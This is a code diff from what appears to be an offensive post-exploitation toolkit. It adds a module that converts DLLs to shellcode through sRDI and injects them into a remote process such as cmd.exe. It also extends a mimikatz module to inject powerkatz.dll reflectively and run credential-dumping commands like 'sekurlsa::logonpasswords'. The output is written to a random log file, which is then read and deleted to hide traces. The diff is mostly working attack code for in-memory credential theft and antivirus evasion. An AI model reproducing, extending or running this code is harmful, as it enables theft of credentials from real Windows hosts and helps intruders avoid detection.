249	+	the DLL must contain a ReflectiveLoader exported function
250	+	injection_type the process injection method to use for injecting shellcode
251	+	Allowed values: 'remote_virtual', 'remote_virtual_protect'
252	+	Default: 'remote_virtual'
253	+	remote_process path to an executable to spawn as a host process for the shellcode
254	+	if you pass a pid it will try to inject into an existing running process
255	+	Default: 'cmd.exe'
256	+
257	+	Examples:
258	+	?????????????????????????????????????????????????????????????????????????????????????????????????????
259	+	?????????????????????????????????????????????????????????????????????????????????????????????????????
260	+	"""
261	+
262	+	__default_exported_function_name = 0x10
263	+	__default_exported_function_data = b'None'
264	+
265	+	def _parse_run_args(self, args):
266	+	if len(args) < 1:
267	+	raise self._exception_class('#inject_dll_srdi: Not enough arguments. 1 Argument required.\n')
268	+	args_parser = {k: v for k, v in enumerate(args)}
269	+	dll_path = args_parser.get(0)
270	+	injection_type = args_parser.get(1, self._default_injection_type)
271	+	remote_process = args_parser.get(2, self._default_remote_process)
272	+	thread_timeout = args_parser.get(3, self._default_thread_timeout)
273	+	thread_parameters = args_parser.get(4, self._default_thread_parameters)
274	+	exported_function_name = args_parser.get(5, self.__default_exported_function_name)
275	+	exported_function_data = args_parser.get(6, self.__default_exported_function_data)
276	+	return dll_path, injection_type, remote_process, thread_timeout, thread_parameters,\
277	+	exported_function_name, exported_function_data
278	+
279	+	def _create_request(self, args):
280	+	dll_path, injection_type, remote_process, thread_timeout,\
281	+	thread_parameters, exported_function_name, exported_function_data = self._parse_run_args(args)
282	+	dll_path = config.modules_paths + 'dll/' + dll_path
283	+	with open(dll_path, 'rb') as file_handle:
284	+	dll_bin_byte_arr = bytearray(file_handle.read())
285	+	srdi_object = sRDI()
286	+	# user_data = '"log C:\\windows\\temp\\powerkatz_srdi.log" privilege::debug sekurlsa::logonpasswords exit\x00'.encode('utf-16-le')
287	+	if exported_function_name != 0x10:
288	+	exported_function_name = srdi_object.HashFunctionName(exported_function_name)
289	+	shellcode_bin_byte_arr = \
290	+	srdi_object.ConvertToShellcode(dll_bin_byte_arr,
291	+	functionHash=exported_function_name,
292	+	userData=exported_function_data)
293	+	base64_compressed_dll = gzip_utils.get_compressed_base64_from_binary(shellcode_bin_byte_arr)
294	+	if injection_type == 'remote_virtual_protect':
295	+	runtime_code = self._runtime_code % (self._runtime_code_virtual_protect, base64_compressed_dll,
296	+	thread_parameters, remote_process,
297	+	thread_timeout, '0')
298	+	else:
299	+	runtime_code = self._runtime_code % (self._runtime_code_virtual, base64_compressed_dll,
300	+	thread_parameters, remote_process,
301	+	thread_timeout, '0')
302	+	return runtime_code
303	+

■ ■ ■ ■ ■ ■

modules/mimikatz.py

		skipped 4 lines
5	5		from modules.runas import Runas
6	6		from modules.invoke_ps_module import Invoke_ps_module
7	7		from modules.invoke_ps_module_as import Invoke_ps_module_as
	8	+	from modules.inject_dll_srdi import Inject_dll_srdi
8	9		from utils.random_string import random_generator
9	10		import traceback
10	11
		skipped 18 lines
29	30		'exe': the classic mimikatz binary will be uploaded to the server and run with arguments.
30	31		It is recommended to run the ps1 version because it will be obfuscated and run from memory.
31	32		The exe version will be just dropped as clear and could be catched by av scanners.
32		-	Exec_Type can be 'ps1' or 'exe'.
33	33
34	34
35	35		Usage:
		skipped 46 lines
82	82		self.runas_module_object = Runas(password, channel_enc_mode, module_settings, request_object)
83	83		self.invoke_ps_module_object = Invoke_ps_module(password, channel_enc_mode, module_settings, request_object)
84	84		self.invoke_ps_as_module_object = Invoke_ps_module_as(password, channel_enc_mode, module_settings, request_object)
	85	+	self.inject_dll_srdi_module_object = Inject_dll_srdi(password, channel_enc_mode, module_settings, request_object)
85	86
86	87		def __parse_run_args(self, args):
87	88		args_parser = {k: v for k, v in enumerate(args)}
		skipped 1 lines
89	90		username = args_parser.get(1, self.__default_username)
90	91		password = args_parser.get(2, self.__default_password)
91	92		domain = args_parser.get(3, self.__default_domain)
92		-	custom_command = args_parser.get(4, self.__default_exe_command if exec_type == 'exe' else self.__default_ps_command)
	93	+	custom_command = args_parser.get(4, self.__default_exe_command if exec_type != 'ps1' else self.__default_ps_command)
93	94		return exec_type, username, password, domain, custom_command
94	95
95	96		def __lookup_exe_binary(self):
		skipped 10 lines
106	107		return bin_path
107	108
108	109		def __run_exe_version(self, username, password, domain, custom_command):
109		-	try:
110		-	remote_upload_path = self.__lookup_exe_binary()
111		-	if username == '':
112		-	response = self.exec_cmd_module_object.run(['""' + remote_upload_path + '""' + ' ' + custom_command])
113		-	else:
114		-	response = self.runas_module_object.run([remote_upload_path + ' ' + custom_command, username, password, domain])
115		-	parsed_response = self._parse_response(response)
116		-	except ModuleException as module_exc:
117		-	parsed_response = str(module_exc)
	110	+	remote_upload_path = self.__lookup_exe_binary()
	111	+	if username == '':
	112	+	response = self.exec_cmd_module_object.run(['""' + remote_upload_path + '""' + ' ' + custom_command])
	113	+	else:
	114	+	response = self.runas_module_object.run([remote_upload_path + ' ' + custom_command, username, password, domain])
	115	+	parsed_response = self._parse_response(response)
	116	+	return parsed_response
	117	+
	118	+	def __run_dll_version(self, username, custom_command):
	119	+	dll_name = 'powerkatz.dll'
	120	+	exported_function_name = 'powershell_reflective_mimikatz'
	121	+	log_file = self._module_settings['env_directory'] + '\\' + random_generator()
	122	+	exported_function_data = str(('"log ' + log_file + '" ' + custom_command + '\x00').encode('utf-16-le'))
	123	+	if username == '':
	124	+	print '\n\nInjecting converted DLL shellcode into remote process...'
	125	+	response = self.inject_dll_srdi_module_object.run([dll_name, 'remote_virtual', 'cmd.exe', '60000', '{}',
	126	+	exported_function_name, exported_function_data])
	127	+	response = self._parse_response(response)
	128	+	response += '\nDLL injection executed!\n\n\nOutput of mimikatz:\n\n'
	129	+	response += self._parse_response(self.exec_cmd_module_object.run(['type ' + log_file + ' & del /f /q ' + log_file]))
	130	+	else:
	131	+	raise self._exception_class('#mimikatz: exec_type "dll" does not support the runas function atm\n')
	132	+	parsed_response = self._parse_response(response)
118	133		return parsed_response
119	134
120	135		def __run_ps_version(self, username, password, domain, custom_command):
		skipped 9 lines
130	145		exec_type, username, password, domain, custom_command = self.__parse_run_args(args)
131	146		if exec_type == 'exe':
132	147		response = self.__run_exe_version(username, password, domain, custom_command)
	148	+	elif exec_type == 'dll':
	149	+	response = self.__run_dll_version(username, custom_command)
133	150		else:
134	151		response = self.__run_ps_version(username, password, domain, custom_command)
135	152		parsed_response = self._parse_response(response)
		skipped 7 lines

■ ■ ■ ■ ■ ■

requirements.txt

skipped 2 lines
3 3 Crypto
4 4 pyopenssl
5 5 pefile
6 - StringIO
7 - gzip
8 6 prettytable

All occurrences

		skipped 2 lines
3	3		Crypto
4	4		pyopenssl
5	5		pefile
6		-	StringIO
7		-	gzip
8	6		prettytable

added injection_srdi module + dll execution type for mimikatz